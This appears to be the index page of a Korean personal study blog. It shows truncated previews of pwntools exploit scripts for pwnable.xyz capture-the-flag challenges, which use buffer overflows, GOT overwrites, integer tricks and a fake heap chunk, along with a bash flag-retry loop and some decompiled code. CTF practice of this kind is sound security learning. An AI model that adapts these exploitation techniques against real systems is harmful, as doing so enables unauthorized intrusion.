대충공부한거적어두는블로그

#!/bin/bash for i in {1..100} do output=$(timeout 5s python my_python_file.py) if [[ $output == *"FLAG{"*"}"* ]]; then flag=$(echo "$output" | grep -o "FLAG{[^}]*}") echo "FLAG FOUND: $flag" exit 0 else echo "FLAG NOT FOUND." fi done echo "FLAG NOT FOUND in 100 tries"​ from pwn import * p = remote("svc.pwnable.xyz", 30017) # p = process("./challenge") p.sendlineafter("Message: ", "minseo") cnry ..

from pwn import * p = remote("svc.pwnable.xyz", 30014) # p = process("./challenge") # 0x408 byte 채워야하므로 시간절약 위해 맨처음에 최대한 읽어놓자 p.sendafter("> ", "1") p.sendafter("data: ", 'A'*127) while True: p.sendafter("> ", "2") tmp = p.recvuntil("chars: ") num = int(tmp[8:-8]) if num>=14: p.send("A"*8) break if num!=0: p.send("\x00") p.sendafter("> ", "3") p.recvuntil('A'*135) win_addr = u64(p.recvline()[:-1..

# exploit 1 (using OOB) from pwn import * p = remote("svc.pwnable.xyz", 30013) # p = process("./challenge") e = ELF("./challenge") p.recvuntil("Name: ") p.send('\x00') p.recvuntil("Desc: ") p.sendline("hahaha") for i in range(8): p.sendlineafter("> ", "1") p.recvuntil("Name: ") p.send("\x00") p.sendlineafter("> ", "1") p.sendlineafter("Name: ", 'A'*0x80+'\x30\x20\x60') # strlen@got p.sendlineaft..

from pwn import * p = remote("svc.pwnable.xyz", 30012) # p = process("./challenge") p.recvuntil("> ") p.send("3") main_rbp = int(p.recvline()[:-1], 16) - 0xf8 print(hex(main_rbp)) fake_rbp = (main_rbp+0x9)&0xff real_rbp = main_rbp&0xff p.recvuntil("> ") pay = '119'+' '*0x1d+chr(fake_rbp) # 0x77 = 119 p.send(pay) p.recvline() # Invalid p.recvuntil("> ") pay = '1'+' '*0x1f+chr(real_rbp) p.send(pay..

from pwn import * p = remote("svc.pwnable.xyz", 30011) # p = process("./challenge") e = ELF("./challenge") p.sendafter("> ", "1") p.sendafter("Name: ", "minseo") p.sendafter("Age: ", "1234") p.sendafter("> ", "3") p.sendafter("Name: ", "minseo") p.sendafter("Age: ", b'A'*0x10+p64(e.got['printf'])) # s에 printf_got 대입 p.sendafter("> ", "1") p.sendafter("Name: ", p64(e.symbols['win'])) # 바로 다음문장 pr..

# exploit1 from pwn import * p = remote("svc.pwnable.xyz", 30010) # p = process("./challenge") e = ELF("./challenge") def edit_name(name): p.recvuntil("> ") p.sendline("1") # getchar()에서 버퍼 비우므로 개행문자까지 넘김 p.sendafter("Name: ", name) def prep_msg(): p.recvuntil("> ") p.sendline("2") # getchar()에서 버퍼 비우므로 개행문자까지 넘김 def choose(num): p.recvuntil("> ") p.sendline(str(num)) # 7byte(이모지+공백) + 25byte(us..

from pwn import * p = remote("svc.pwnable.xyz", 30008) p.recvuntil("x: ") p.send("1336") p.recvuntil("y: ") p.send("4294967295") p.recvline() p.sendline("3 1431656211") p.recvline() p.sendline("1 1 1 3 3") p.interactive() int __cdecl main(int argc, const char **argv, const char **envp) { setup(argc, argv, envp); puts("The l33t-ness level."); // 라운드 세 개 전부 통과 if ( (unsigned __int8)round_1() && (u..

from pwn import * p = remote("svc.pwnable.xyz", 30007) p.sendlineafter("Exit", "1") p.sendlineafter("Size: ", "0x400a31") # unsigned_long(8B)에선 4294967294 # signed_int(4B)에선 -2 p.sendlineafter("Exit", "0xfffffffe") p.interactive() int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // [rsp+Ch] [rbp-4h] setup(argc, argv, envp); while ( 1 ) { print_menu(); printf(..

from pwn import * p = remote("svc.pwnable.xyz", 30006) # p = process("./challenge") # gdb.attach(p) # pause() # read_int32()에서 입력값의 마지막 바이트 null로 변환하므로 sendline() p.sendlineafter("> ", "3") p.recvline() p.sendafter("instead? ", "y") p.sendafter("comment: ", "minseo") # do_comment 1byte overflow(\x00), real_print_flag()를 가리킨다 p.sendlineafter("> ", "1") p.sendlineafter("len: ", "64") # char key[64..

from pwn import * # context.log_level = 'debug' p = remote("svc.pwnable.xyz", 30005) # p = process("./challenge") # pwndbg 터미널 열리면 거기서 bp 세팅하고 c 입력 후 원래 터미널에서 아무키나 입력 (동적분석!!!!) # 그러면 파이썬 코드 실행되고 bp에서 멈출 것. free() 근처에서 분석하자 # gdb.attach(p) # pause() win = 0x400a3e # 위치 안변하고, write 가능한 바이너리의 .data영역 (0x601000~0x602000)에 fake_chunk 만들자 # 0x601010, 0x601020 에는 stdin,stdout 관련 데이터 들어있으므로 0x601030 부터..